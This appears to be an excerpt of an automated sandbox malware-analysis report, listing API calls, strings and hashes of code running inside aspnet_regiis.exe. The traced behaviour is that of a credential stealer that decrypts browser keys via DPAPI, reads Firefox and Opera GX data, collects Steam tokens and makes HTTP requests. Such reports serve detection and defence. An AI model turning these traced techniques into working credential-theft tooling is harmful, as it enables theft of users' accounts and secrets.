                                                                                                                                                                              • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                              • API String ID: 2929475105-1435860445
                                                                                                                                                                              • Opcode ID: 8a475a0e6769f77ac62fb906435b5f40d136647f708428b44fe89ba06b1fbb26
                                                                                                                                                                              • Instruction ID: a54f6066ca0a8bc023de53d821c6a08ef24a9413ce47fdec55385e6fb4fbc4f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a475a0e6769f77ac62fb906435b5f40d136647f708428b44fe89ba06b1fbb26
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D314D71DC07349FCB12AF68FE8165DBBB2EB487107004665E809B31A0DB35AAE5CF85
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A16DCD
                                                                                                                                                                              • lstrlen.KERNEL32(?,0000001C), ref: 02A16DD8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16E5C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                              • String ID: ERROR
                                                                                                                                                                              • API String ID: 591506033-2861137601
                                                                                                                                                                              • Opcode ID: cea891fa1ee6cc96d1f5d1beff13e8cdc6f689110ecedaf7b5dfa51dea563793
                                                                                                                                                                              • Instruction ID: a3a1945a1bf4cf02e7a95f12375865e30afee70edd875f3829eacb83a0225768
                                                                                                                                                                              • Opcode Fuzzy Hash: cea891fa1ee6cc96d1f5d1beff13e8cdc6f689110ecedaf7b5dfa51dea563793
                                                                                                                                                                              • Instruction Fuzzy Hash: EA112E71C806199FCB40FFB8D645A9DBBB6BF14320B504621D819E7550EF31EAA98FC1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B3D7
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B529
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B544
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0B596
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                              • Opcode ID: b8575b37e907f5f32269c0eca655e443c332c4e7f407b2afabb2f6fbaebae403
                                                                                                                                                                              • Instruction ID: 6a4bb35669790de0bdefa419be65da1b02e9cb240cb36c94f0f7e490f9850d28
                                                                                                                                                                              • Opcode Fuzzy Hash: b8575b37e907f5f32269c0eca655e443c332c4e7f407b2afabb2f6fbaebae403
                                                                                                                                                                              • Instruction Fuzzy Hash: 3471F932D802299BCF01FBA4EE85ADDB776BF04364F514421E905B71A0DF30AE598FA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?,02A37538,02A3688A), ref: 02A0D49F
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0D4B2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                              • API String ID: 161838763-3310892237
                                                                                                                                                                              • Opcode ID: e785e764b9eaf86aba972b57d570eab516d07612eeb391285fb849996aa151fc
                                                                                                                                                                              • Instruction ID: f7cd7e4c0edec5784dd746d782e4cc8f3a61b1dcaa60c42004fa077d8eddf04b
                                                                                                                                                                              • Opcode Fuzzy Hash: e785e764b9eaf86aba972b57d570eab516d07612eeb391285fb849996aa151fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4641D636D801299BCF01FBA4EE85ACDB7B6AF14364B414120ED05B7190DF64AE598FE1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                                • Part of subcall function 02A08048: LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                                • Part of subcall function 02A08048: LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                                • Part of subcall function 02A080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A0823B), ref: 02A080C4
                                                                                                                                                                                • Part of subcall function 02A080A1: LocalAlloc.KERNEL32(00000040,02A0823B,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080D8
                                                                                                                                                                                • Part of subcall function 02A080A1: LocalFree.KERNEL32(02A0CB95,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080FD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                              • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                              • API String ID: 2311102621-738592651
                                                                                                                                                                              • Opcode ID: 31dee6bf2b8fa23410cd8e7e69caaf7c7fad09b48b0716e2e7a070d41a1d7272
                                                                                                                                                                              • Instruction ID: b5e738e9b84a86547e134ca8149a3c5f2667cbde47e5994198c3cdde0e5fcd1b
                                                                                                                                                                              • Opcode Fuzzy Hash: 31dee6bf2b8fa23410cd8e7e69caaf7c7fad09b48b0716e2e7a070d41a1d7272
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B219232E80209AFDF14EB94EDC0ADEB779AF49360F104565E920A71D0DF34EE49CA54
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A06963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                                • Part of subcall function 02A06963: StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                                • Part of subcall function 02A06963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                                • Part of subcall function 02A06963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                                • Part of subcall function 02A06963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                                • Part of subcall function 02A06963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                                • Part of subcall function 02A06963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16873
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                                                              • API String ID: 3086566538-2579291623
                                                                                                                                                                              • Opcode ID: 7e6b29f983d18becd28695437ff828f3c5ee3ad6c2023122b6263b764624dfb5
                                                                                                                                                                              • Instruction ID: 88cf2b0ccdbdfc42a9aabbcfc129885df2645238f701e07a6eccf83cb9dff1ef
                                                                                                                                                                              • Opcode Fuzzy Hash: 7e6b29f983d18becd28695437ff828f3c5ee3ad6c2023122b6263b764624dfb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 3B018635D80218ABCB21FF74E985ACD33AE6F10720B444161FD25E3151EF30E9098ED1
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 02A16EFE
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4198075804-0
                                                                                                                                                                              • Opcode ID: d22b94ad04d38b2d2026065e1d3dd6c3e7b0531b2147025ae2452d2d7d1e12d8
                                                                                                                                                                              • Instruction ID: a0ed6a66ea63ec81cdb2171b2b6e6751aef9ae6485664d9142e90c5ebcf2ec4e
                                                                                                                                                                              • Opcode Fuzzy Hash: d22b94ad04d38b2d2026065e1d3dd6c3e7b0531b2147025ae2452d2d7d1e12d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 64211972880228ABCF00EF95E9849DE7BB9FF44764F004526FD05A7140DB30EA96CFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,02A14A8D,02A14A8D,00000000,?,?,?,02A14A8D), ref: 02A12487
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14A8D), ref: 02A1249E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,02A13DEA,00000000,?), ref: 02A1226C
                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A12287
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A1228E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CA63095
                                                                                                                                                                                • Part of subcall function 6CA635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CAEF688,00001000), ref: 6CA635D5
                                                                                                                                                                                • Part of subcall function 6CA635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CA635E0
                                                                                                                                                                                • Part of subcall function 6CA635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CA635FD
                                                                                                                                                                                • Part of subcall function 6CA635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CA6363F
                                                                                                                                                                                • Part of subcall function 6CA635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CA6369F
                                                                                                                                                                                • Part of subcall function 6CA635A0: __aulldiv.LIBCMT ref: 6CA636E4
                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA6309F
                                                                                                                                                                                • Part of subcall function 6CA85B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CA856EE,?,00000001), ref: 6CA85B85
                                                                                                                                                                                • Part of subcall function 6CA85B50: EnterCriticalSection.KERNEL32(6CAEF688,?,?,?,6CA856EE,?,00000001), ref: 6CA85B90
                                                                                                                                                                                • Part of subcall function 6CA85B50: LeaveCriticalSection.KERNEL32(6CAEF688,?,?,?,6CA856EE,?,00000001), ref: 6CA85BD8
                                                                                                                                                                                • Part of subcall function 6CA85B50: GetTickCount64.KERNEL32 ref: 6CA85BE4
                                                                                                                                                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CA630BE
                                                                                                                                                                                • Part of subcall function 6CA630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CA63127
                                                                                                                                                                                • Part of subcall function 6CA630F0: __aulldiv.LIBCMT ref: 6CA63140
                                                                                                                                                                                • Part of subcall function 6CA9AB2A: __onexit.LIBCMT ref: 6CA9AB30
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6ca60000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291168024-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1664310425-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,02A36853,02A3684B,?,?,?), ref: 02A0C98F
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A0819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                              • String ID: Opera GX
                                                                                                                                                                              • API String ID: 1719890681-3280151751
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,02A07C56,?), ref: 02A07B8A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 544645111-3916222277
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16FFE
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 02A1700E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                              • API String ID: 502913869-3507145866
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16378
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A16396
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                              • Opcode ID: d2311854abefe034e0e3780357851736cc074abdbd1253d486b54aea4fe29ca4
                                                                                                                                                                              • Instruction ID: e01f555881b67e4d4132ca3853c5806c61392da0778ddfa7dfaa0e9f80383b91
                                                                                                                                                                              • Opcode Fuzzy Hash: d2311854abefe034e0e3780357851736cc074abdbd1253d486b54aea4fe29ca4
                                                                                                                                                                              • Instruction Fuzzy Hash: 0831A872C8011CAFDB05EB60DD82EE9777EFB48310F440999A90AA3110EE31DBA09F91
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,02A07C18,?,?), ref: 02A0784A
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02A07874
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
